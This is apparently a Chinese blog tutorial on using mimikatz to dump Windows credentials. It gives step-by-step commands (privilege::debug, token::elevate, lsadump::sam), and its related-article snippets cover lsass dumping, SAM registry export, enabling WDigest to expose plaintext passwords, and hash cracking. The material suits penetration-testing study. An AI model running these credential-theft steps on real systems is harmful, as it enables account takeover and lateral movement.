使用mimikatz获取windows密码凭证

最新推荐文章于 2026-04-05 07:48:00 发布
原创 最新推荐文章于 2026-04-05 07:48:00 发布 · 2.4k 阅读 · 3 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#安全 #网络安全 #web安全 #linux
本文介绍了如何使用mimikatz工具进行权限提升至NTAUTHORITYSYSTEM,并通过lsadump::sam命令获取NTLM哈希。操作需在管理员权限的cmd环境下进行。

工具:mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz/releases

1、开启mimikatz。以管理员权限打开cmd,进入mimikatz相应操作系统的目录下,输入命令:

mimikatz.exe

 

2、提升权限,输入命令:

 privilege::debug

(如果出现以下报错:ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)

3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:

 token::elevate

 3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:

token::elevate

 4、获取到NTLM的hash,输入命令:

lsadump::sam

 

 

L_yann
关注
mimikatz在win7和win10抓取密码
ygylemon的博客
12-09 1983
右键lsass.exe可以创建一个名为lsass.DMP的文件,这个文件包括windows存储的密码密码存放位置 C:\windows\system32\config\SAM,但是在域内渗透中,需要提供管理员权限才能进行转存文件,此时需要用到procdump。privilege::debug 先进行权限提升,然后sekurl::logonpasswords,就可以导出明文密码了。首先,需要下载一个procdump,是一款命令行工具,其主要目的是监视CPU峰值的应用程序,并产生了。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 9万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
mimikatz使用教程
最新发布
2301_78519654的博客
04-05 863
mimikatz 是一款功能强大的 Windows 平台安全工具,主要用于从内存中提取密码、哈希、票据等敏感凭据信息。它最初由法国安全研究员 Benjamin Delpy 开发,因能够直接获取明文密码而在渗透测试和安全审计领域广为人知。该工具利用 Windows 系统的安全机制缺陷,在获得管理员权限后可以访问内存中的认证信息,支持提取多种类型的凭据(如 LM/NTLM 哈希、Kerberos 票据、PIN 码等),还具备票据伪造、权限提升等高级功能,是攻防演练和系统安全评估中的重要工具。
mimikatz获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7900
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ranzi.
02-06 8955
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
萌新如何玩转mimikatz
m0_71745484的博客
02-13 8335
mimikatz就是我遇见的一个坎
mimikatz抓取密码
G208_522的博客
10-26 5319
mimikatz抓取密码
Windows密码凭证获取实战:从Mimikatz到Powershell的5种常用方法(附避坑指南)
dream的博客
02-18 954
本文详细介绍了Windows系统中获取密码凭证的5种实战方法,包括Mimikatz内存提取、Powershell无文件攻击、离线哈希提取等关键技术,并提供了常见问题的解决方案和避坑指南。重点解析了Mimikatz这一Windows凭证提取标准工具的使用场景和防御规避技巧,帮助安全人员全面了解Windows凭证安全风险。
网安系列【23】之Windows密码凭证获取
缘友一世的博客
07-17 1863
网安系列【23】之Windows密码凭证获取
转:获取windows凭证管理器明文密码
weixin_30411819的博客
06-24 4040
1.运行cmdkey /list查看windows保存凭证 方法1.mimikaz mimikatz vault::cred 2.利用powershell尝试获取 windows 普通凭据类型中的明文密码 powershell-import F:\tools\powershell脚本\Invoke-WCMDump.ps1 powershell Invoke-WCMDd...
Mimikatz介绍
#7的博客
03-26 4759
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 3590
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
解决:ERROR kuhl m_privilege simple: Rtiadjustprivilege (20) c0000061
(●'◡'●)
07-17 4257
ERROR kuhl m_privilege simple: Rtiadjustprivilege (20) c0000061 打开附件--找到命令行--右键--管理员打开 好了,芜湖~
mimkatz获取windows10明文密码
banliyaoguai的博客
05-31 3576
Windows 10或更高版本的系统中,默认情况下,操作系统会在内存缓存中禁止保存明文密码。然后,再次使用mimikatz等工具读取lsass.exe进程的内存,即可获取到明文密码mimikatz通过注入代码到操作系统的内存中,能够读取和解密这些由lsass.exe进程保存的加密凭证。具体的操作是,mimikatz先利用管理员权限执行一些操作,如使用procdump等工具lsass.exe进程转储成一个dmp文件。当用户登录时,lsass.exe会使用一个可逆的算法加密明文密码,并将密文保存在内存中。
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 2994
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
11--使用 mimikatz 提取 windows凭据密码
SunShine
06-28 4万+
mimikatz一.mimikatz简介  是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://...
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 2270
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码
在Win10系统中用mimikatz抓取明文密码
weixin_42558965的博客
03-22 4750
实验环境 :Windows10专业版 参考了网上的方法,发现大部分都是抄的 https://blog.csdn.net/netsec_steven/article/details/107257325 这一篇文章,都被转烂了,这一篇文章是对的,但是路径上还是有点小问题的,原因是原作者跳了一个步骤 这个步骤是:在注册表HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下新建一个名为UseLogonCredential的DWORD值,并且
内网渗透之某后渗透利用【网络安全
kali_Ma的博客
03-23 3803
主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值